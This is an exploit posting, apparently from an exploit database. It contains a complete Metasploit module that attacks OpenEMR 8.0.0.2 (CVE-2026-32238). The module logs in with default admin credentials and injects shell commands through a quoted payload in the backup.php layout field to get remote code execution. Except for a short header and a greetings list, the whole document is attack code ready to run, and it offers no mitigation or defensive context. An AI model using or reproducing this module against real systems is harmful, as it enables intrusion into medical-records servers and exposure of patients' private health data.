Exploit for 📄 OpenEMR 8.0.0.2 Remote Code Execution CVE-2026-32238

## https://sploitus.com/exploit?id=PACKETSTORM:219177
==================================================================================================================================
    | # Title     : OpenEMR 8.0.0.2 Remote Code Execution Module                                                                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads                                                        |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit exploit module targets a potential Remote Code Execution (RCE) vulnerability in OpenEMR systems identified as CVE-2026-32238. 
                     The module combines authentication handling, HTTP request manipulation, and command injection capabilities to achieve remote command execution on vulnerable installations.
    
    [+] POC        :  
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(update_info(info,
          'Name' => 'OpenEMR CVE-2026-32238 RCE ',
          'Description' => 'Remote Code Execution Module',
          'Author' => ['indoushka'],
          'License' => MSF_LICENSE
        ))
    
        register_options([
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'SSL', true]),
          OptString.new('TARGETURI', [true, 'Path', '/openemr/']),
          OptString.new('USERNAME', [true, 'User', 'admin']),
          OptString.new('PASSWORD', [true, 'Pass', 'admin']),
          OptInt.new('TIMEOUT', [true, 'Timeout', 10])
        ])
    
        @cookie = nil
      end
    
      def uri(path)
        normalize_uri(datastore['TARGETURI'], path)
      end
    
      def authenticate
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri('interface/main/main_screen.php'),
          'vars_post' => {
            'authUser' => datastore['USERNAME'],
            'clearPass' => datastore['PASSWORD']
          },
          'timeout' => datastore['TIMEOUT']
        })
    
        return false unless res
    
        if res.get_cookies =~ /OpenEMR=([^;]+)/
          @cookie = "OpenEMR=#{$1}"
          return true
        end
    
        false
      end
    
      def inject(cmd)
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => uri('interface/main/backup.php'),
          'cookie' => @cookie,
          'vars_post' => {
            'form_step' => '102',
            'form_sel_layouts[]' => cmd
          },
          'timeout' => datastore['TIMEOUT']
        })
    
        res && res.code == 200
      end
    
      def execute_command(cmd, _opts = {})
        payload = "LBF\"';#{cmd} #"
    
        print_status("Injecting: #{cmd}")
    
        unless inject(payload)
          fail_with(Failure::NotVulnerable, 'Injection failed')
        end
      end
    
      def exploit
        unless authenticate
          fail_with(Failure::NoAccess, 'Auth failed')
        end
    
        print_status("Target: #{rhost}")
    
        execute_command(payload.encoded)
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================